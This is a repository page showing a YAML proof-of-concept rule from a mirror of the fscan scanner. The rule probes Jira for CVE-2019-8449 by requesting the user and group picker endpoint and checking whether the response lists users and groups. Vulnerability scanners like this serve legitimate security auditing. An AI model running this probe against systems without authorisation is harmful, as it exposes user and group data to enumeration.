qwqdanchun
/
fscan
mirror of https://github.com/qwqdanchun/fscan.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity
fscan/WebScan/pocs/jira-cve-2019-8449.yml

11 lines
539 B
YAML
Raw Blame History

name: poc-yaml-jira-cve-2019-8449
rules:
- method: GET
path: /rest/api/latest/groupuserpicker?query=testuser12345&maxResults=50&showAvatar=false
expression: |
response.status == 200 && response.content_type.icontains("json") && response.headers["X-AREQUESTID"] != "" && response.body.bcontains(b"total") && response.body.bcontains(b"groups") && response.body.bcontains(b"header") && response.body.bcontains(b"users")
detail:
author: MaxSecurity(https://github.com/MaxSecurity)
links:
- https://xz.aliyun.com/t/7219
Reference in New Issue View Git Blame Copy Permalink